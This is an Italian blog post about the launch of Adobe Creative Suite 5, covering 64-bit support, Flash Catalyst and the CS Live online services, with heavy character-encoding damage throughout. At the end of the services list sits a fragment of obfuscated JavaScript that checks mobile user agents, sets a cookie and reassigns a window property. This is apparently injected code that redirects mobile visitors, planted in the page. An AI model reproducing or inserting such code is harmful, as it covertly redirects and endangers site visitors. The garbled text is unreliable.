Adobe Creative Suite 5

Adobe ha recentemente lanciato Creative Suite 5, l’aggiornamento dell’intero pacchetto di software per la creazione multimediale. Lo sviluppo e l’integrazione di buona parte delle novitAi??, secondo quanto riportato dai vertici societari italiani presenti nel corso della conferenza, riguarda principalmente l’ottimizzazione e la necessitAi?? di migliorare il flusso di lavoro: per questo motivo, la maggior parte delle applicazioni presenti all’interno della suite sono in grado di interagire tra loro, rendendo molto piA? semplice e veloce la possibilitAi?? di condividere i contenuti.

Anche in questa direzione puntano i nuovi cinque servizi online definiti CS Live, rispettivamente Adobe BrowserLab, Adobe CS Review, Acrobat.com, Adobe Story e Omniture SiteCatalyst NetAverages.

Il maggior cambiamento A? rappresentato dal supporto nativo per i 64 bit: Adobe Photoshop, Premiere Pro e After Effects sono le applicazioni che funzioneranno, sia su sistemiAi??WindowsAi??che su soluzioni Apple, sfruttando i 64 bit eAi??garantendo cosAi?? la possibilitAi?? di sfruttare correttamente quantitativi di memoria superiore ai 4GB.

La principale integrazione A? Flash Catalyst, un applicativo dedicato ai grafici che hanno anche delle esigenze base di sviluppo tecnico:Flash Catalyst consente di poter lavorare sui contenuti prodotti con Illustrator e modificarli per integrare funzionalitAi?? multimediali.

Ecco invece i servizi chiamati CS live:

  • Adobe CS Review – A? un servizio che consente di poter controllare i design e i layout di determinate pagine web direttamente dai software presenti in Adobe Creative Suite 5;
  • Adobe BrowserLab – si tratta di un’applicazione cheAi??permette diAi?? avere un’anteprima del proprio sito web su diversi sistemi operativi e suAi??molteplici browser, per controllare direttamente il risultato finale e la compatibilitAi?? del proprio lavoro;
  • Adobe NeteAverages – si presenta come una funzione cheAi??analizza i dati relativi non solo al numero di visite, ma anche l’utilizzo della pagina web;
  • Adobe Story – un servizio per la scrittura collaborativa di copioni cinematografici;
  • Acrobat.com – A? un servizio che permette di poter sfruttare la funzione di video conferenza Adobe.
  • 400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

    Lascia un commento